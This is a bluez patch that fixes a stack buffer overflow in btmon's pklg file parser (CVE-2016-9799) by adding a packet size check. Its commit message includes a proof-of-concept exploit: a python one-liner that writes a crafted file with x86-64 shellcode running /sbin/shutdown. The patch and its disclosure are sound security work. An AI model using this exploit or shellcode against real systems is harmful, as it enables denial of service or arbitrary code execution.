File 0005-btmon-fix-stack-buffer-overflow.patch of Package bluez.25541

From 0f4b19f7f94df696983d0ce3bb0515e960474cba Mon Sep 17 00:00:00 2001
From: Matias Karhumaa <matias.karhumaa@gmail.com>
Date: Tue, 16 Oct 2018 23:21:50 +0300
Subject: [PATCH 05/13] btmon: fix stack buffer overflow

Arbitrary code execution vulnerability was discovered in btmon.
pklg_read_hci function read from file attacker controllable
amount of data which caused stack buffer overflow.

Fixes old and previously unfixed CVE-2016-9799.

Initially this was reported by op7ic:
https://www.spinics.net/lists/linux-bluetooth/msg68898.html

Later this was re-discovered by fuzzing btmon with AFL.

Proof-of-concept exploit that shutowns the machine:
$ python -c 'print "\x00\x00\x0c\x10"+ "\x90"*609 +"\x48\x31\xc0\x48\x31\xd2\x50\x6a\x77\x66\x68\x6e\x6f\x48\x89\xe3\x50\x66\x68\x2d\x68\x48\x89\xe1\x50\x49\xb8\x2f\x73\x62\x69\x6e\x2f\x2f\x2f\x49\xba\x73\x68\x75\x74\x64\x6f\x77\x6e\x41\x52\x41\x50\x48\x89\xe7\x52\x53\x51\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"+ "\x90"*847 +"\xb0\xda\xff\xff\xff\x7f\x00\x00"' > exploit
$ ./btmon -r exploit

Proof of concept requires that ASLR is disabled and following CFLAGS are
set: -fno-stack-protector -zexecstack
---
 src/shared/btsnoop.c | 5 +++++
 1 file changed, 5 insertions(+)

Index: bluez-5.48/src/shared/btsnoop.c
===================================================================
--- bluez-5.48.orig/src/shared/btsnoop.c
+++ bluez-5.48/src/shared/btsnoop.c
@@ -339,6 +339,11 @@ static bool pklg_read_hci(struct btsnoop
 		tv->tv_usec = ts & 0xffffffff;
 	}
 
+	if (toread > BTSNOOP_MAX_PACKET_SIZE) {
+                btsnoop->aborted = true;
+                return false;
+        }
+
 	switch (pkt.type) {
 	case 0x00:
 		*index = 0x0000;
openSUSE Build Service is sponsored by